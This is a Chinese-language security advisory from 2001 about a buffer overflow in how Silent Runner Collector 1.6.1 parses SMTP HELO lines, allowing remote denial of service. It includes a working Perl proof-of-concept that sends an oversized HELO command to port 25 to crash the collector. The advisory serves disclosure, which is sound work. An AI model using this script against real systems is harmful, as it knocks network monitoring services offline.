Silent Runner Collector 在HELO命令中存在缓冲溢出发布时间:2001-04-02 更新时间:2001-04-02 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Silent Runner Collector 1.6.1详细描述 SilentRunner(http://www.silentrunner.com/)是一个被动的,多功能的来监视 网络活动的工具,并能产生图形化的网络使用情况和漏洞,其中在程序SNIFF部分 中存在一个对SMTP请求解析问题导致远程攻击者可以使程序崩溃。问题存在于SMTP HELO行中的缓冲区,当超过4096字节HELO命令作为网络信息段给程序监视,将导致 程序崩溃。 测试代码 #!/usr/bin/perl # This is a simple script that demonstrates the # SRC HELO overflow vulnerability. It will result # in a crashed silent runner collector so please do # not use it on production networks. It is intended # for demonstration purposes only. use IO::Socket; $remote_host = '192.168.111.3'; $remote_port = 25; $buf = 'A' x 4092; $socket = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port, Proto => "tcp", Type => SOCK_STREAM) or die "Can't connect to $remote_host:$remote_port : $@\n"; # 'HELO ' + $buf = 4097 bytes ( 1 byte too much) print $socket "HELO $buf"; exit; 解决方案 尚无 相关信息 Jack Hayes(jackhayes at CABLESPEED.COM) |
